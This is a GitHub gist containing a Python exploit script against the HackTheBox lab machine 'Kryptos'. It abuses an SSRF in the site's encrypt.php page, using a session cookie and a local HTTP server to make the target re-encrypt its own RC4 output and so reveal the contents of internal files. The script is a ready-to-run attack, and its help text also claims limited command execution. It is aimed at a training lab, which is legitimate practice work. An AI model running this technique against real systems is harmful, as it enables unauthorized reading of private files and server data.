Skip to content

Instantly share code, notes, and snippets.

@xct
Created Apr 28, 2019
Embed
What would you like to do?
Gets files via ssrf using the encrypt functionality
from base64 import *
import requests
import re
import argparse
import tempfile
import threading
import os
import urllib.parse
from http.server import HTTPServer, SimpleHTTPRequestHandler
kryptos = "http://10.10.10.129/"
proxyDict = {
"http" : "http://127.0.0.1:8080",
}
def get(url, ip, port, sessid):
with tempfile.TemporaryDirectory() as tmpdir:
# run server
server = HTTPServer((ip, int(port)), SimpleHTTPRequestHandler)
thread = threading.Thread(target = server.serve_forever)
thread.daemon = True
thread.start()
# make requests
os.chdir(tmpdir)
with open("tmp","wb+") as f:
cookies = {
'PHPSESSID': sessid,
}
params = (
('cipher', 'RC4'),
('url', url),
)
r = requests.get(kryptos+'encrypt.php', params=params, cookies=cookies, proxies=proxyDict, verify=False)
m = re.search('"output">(.+)<', r.text)
if m:
print("[+] Got encrypted result")
f.write(b64decode(m.groups(1)[0]))
else:
return "Error getting encrypted file"
with open("tmp","r") as f:
print("[*] Size: "+ str(os.fstat(f.fileno()).st_size))
params = (
('cipher', 'RC4'),
('url', 'http://' + ip + ':' + str(port) + "/tmp"),
)
r = requests.get(kryptos+'encrypt.php', params=params, cookies=cookies, proxies=proxyDict, verify=False)
m = re.search('"output">(.+)<', r.text)
if m:
print("[+] Decrypted:")
result = m.groups(1)
try:
print(b64decode(result[0]).decode('utf-8'))
except:
print(b64decode(result[0]))
else:
print("[-] Failed decrypting..")
server.shutdown()
return "[*] Done"
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="retrieves files and executes limited commands on kryptos @ hackthebox (you must adjust ip, port and session id at the top of this script)")
parser.add_argument("method", help="get, getphp, exec")
parser.add_argument("ip")
parser.add_argument("port")
parser.add_argument("phpsessid")
parser.add_argument("url")
args = parser.parse_args()
if args.method == 'get':
print(get(args.url, args.ip, args.port, args.phpsessid))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment